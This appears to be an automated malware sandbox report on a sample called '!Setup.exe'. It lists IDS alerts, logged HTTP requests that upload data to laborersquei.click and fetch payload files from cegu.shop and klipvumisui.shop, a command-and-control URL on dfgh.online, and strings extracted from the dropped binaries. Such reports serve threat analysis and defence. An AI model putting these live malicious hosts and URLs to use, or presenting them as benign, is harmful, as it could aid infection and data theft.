Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49777 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49788 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49782 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49798 -> 104.21.89.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49810 -> 104.21.37.128:443
Source: Network traffic	Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.5:49810

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XRAUCISNFQO2DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12804Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VOXJSLGLRZY1I616User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HA4OO9J9XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20512Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HCCMAK2AO03M0W7V7VUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5487Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XHJP64HTSIHHXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1213Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QIPSW5CZVYIKZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 578286Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: laborersquei.click
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop

Source: global traffic	DNS traffic detected: DNS query: ArHGNpsPYiljnDdfvwsaosASId.ArHGNpsPYiljnDdfvwsaosASId
Source: global traffic	DNS traffic detected: DNS query: laborersquei.click
Source: global traffic	DNS traffic detected: DNS query: cegu.shop
Source: global traffic	DNS traffic detected: DNS query: klipvumisui.shop
Source: global traffic	DNS traffic detected: DNS query: dfgh.online

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click

Source: !Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3347093671.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp, !Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3347093671.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp, !Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3347093671.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp, !Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Substances.9.dr, Publisher.com.2.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Amend.9.dr, Publisher.com.2.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Substances.9.dr, Publisher.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Amend.9.dr, Publisher.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Substances.9.dr, Publisher.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.usertr
Source: !Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3347093671.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp, !Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3347093671.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp, !Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: !Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3347093671.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp, !Setup.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/Sectig
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: !Setup.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000010.00000002.2649429807.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3347093671.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp, !Setup.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3347093671.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp, !Setup.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: !Setup.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3347093671.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp, !Setup.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Substances.9.dr, Publisher.com.2.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr, _isdecmp.dll.19.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Amend.9.dr, Publisher.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Amend.9.dr, Substances.9.dr, Publisher.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Substances.9.dr, Publisher.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000010.00000002.2646877718.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: powershell.exe, 00000010.00000002.2646877718.0000000004A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amend.9.dr, Publisher.com.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Substances.9.dr, Publisher.com.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: http://subca.ocsp-certum.com01
Source: powershell.exe, 00000010.00000002.2646877718.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Publisher.com, 0000000C.00000000.2073055433.0000000000795000.00000002.00000001.01000000.00000007.sdmp, Amend.9.dr, Publisher.com.2.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: http://www.certum.pl/CPS0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3347093671.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp, !Setup.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.faststone.org/
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.faststone.org/FSCTutorial.htm
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.faststone.org/FSCTutorial.htmU
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.faststone.org/U
Source: powershell.exe, 00000010.00000002.2646877718.0000000004A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBcq
Source: powershell.exe, 00000010.00000002.2649429807.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.2649429807.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.2649429807.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.2646877718.0000000004D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online
Source: powershell.exe, 00000010.00000002.2645597894.00000000009A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: powershell.exe, 00000010.00000002.2646877718.0000000004D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2646877718.0000000004B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2651074303.0000000007119000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
Source: powershell.exe, 00000010.00000002.2646333940.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compname=
Source: powershell.exe, 00000010.00000002.2646877718.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000010.00000002.2646877718.0000000004FCF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: https://jrsoftware.org/
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe, 00000012.00000000.2849006736.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: https://jrsoftware.org0
Source: powershell.exe, 00000010.00000002.2649429807.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: Amend.9.dr, Publisher.com.2.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	String found in binary or memory: https://www.certum.pl/CPS0
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://www.faststone.org/order.htm
Source: vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://www.faststone.org/order.htmU
Source: Publisher.com.2.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe, 00000012.00000003.2852184908.000000000370F000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.exe, 00000012.00000003.2855637475.000000007ED8B000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000000.2858778988.0000000000301000.00000020.00000001.01000000.0000000B.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000000.2879360907.0000000000E2D000.00000020.00000001.01000000.0000000D.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.18.dr, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.20.dr	String found in binary or memory: https://www.innosetup.com/
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe, 00000012.00000003.2852184908.000000000370F000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.exe, 00000012.00000003.2855637475.000000007ED8B000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000000.2858778988.0000000000301000.00000020.00000001.01000000.0000000B.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000000.2879360907.0000000000E2D000.00000020.00000001.01000000.0000000D.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.18.dr, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.20.dr	String found in binary or memory: https://www.remobjects.com/ps

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.5:49810 version: TLS 1.2

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F9

